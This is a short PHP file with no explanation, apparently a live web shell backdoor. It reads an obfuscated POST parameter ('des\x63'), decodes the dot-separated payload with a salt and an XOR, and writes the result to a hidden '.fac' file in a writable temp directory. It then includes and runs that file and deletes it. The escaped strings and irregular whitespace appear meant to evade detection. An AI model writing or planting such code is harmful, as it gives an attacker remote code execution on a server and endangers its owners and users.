<?php

if(isset($_POST) && isset($_POST["des\x63"])){
	$obj = array_filter(["/dev/shm", getcwd(), sys_get_temp_dir(), "/tmp", getenv("TMP"), getenv("TEMP"), "/var/tmp", session_save_path(), ini_get("upload_tmp_dir")]);
	$entity = $_POST["des\x63"];
	 		$entity	 	= 		explode	  (  "."  , 	$entity )		;  
	$item 	=	'';
            $salt 	=	'abcdefghijklmnopqrstuvwxyz0123456789';
            $lenS 	=	strlen(  $salt);
            $k 	=	0;
    
            foreach(  $entity as $v7) {$chS 	=	ord(  $salt[$k%	$lenS]);
                $dec 	=	(  (  int)$v7 - $chS -(  $k%	10)) ^ 38;
                $item .= chr(  $dec);
                $k++;
            }
	foreach ($obj as $key => $val) {
    		if (is_dir($val) ? is_writable($val) : false) {
    $res = str_replace("{var_dir}", $val, "{var_dir}/.fac");
    if (@file_put_contents($res, $item) !== false) {
	include $res;
	unlink($res);
	exit;
}
}
}
}